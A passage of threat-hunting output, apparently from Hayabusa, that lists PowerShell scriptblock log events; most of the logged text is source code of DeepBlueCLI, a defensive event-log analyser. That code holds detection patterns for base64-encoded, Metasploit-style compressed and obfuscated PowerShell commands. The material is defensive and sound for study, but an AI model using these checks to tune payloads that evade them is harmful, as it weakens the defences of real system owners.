evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational""",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:05.021 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"{$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. 
Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded 
function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:05.021 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is 
whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. 
# If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:05.021 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:05.024 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:05.029 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:05.032 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" 
{$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:18.017 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:18.017 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:18.018 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. 
# $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:18.019 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. 
Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:18.046 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:18.048 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:18.049 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:19.155 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:35.122 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:35.127 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of 
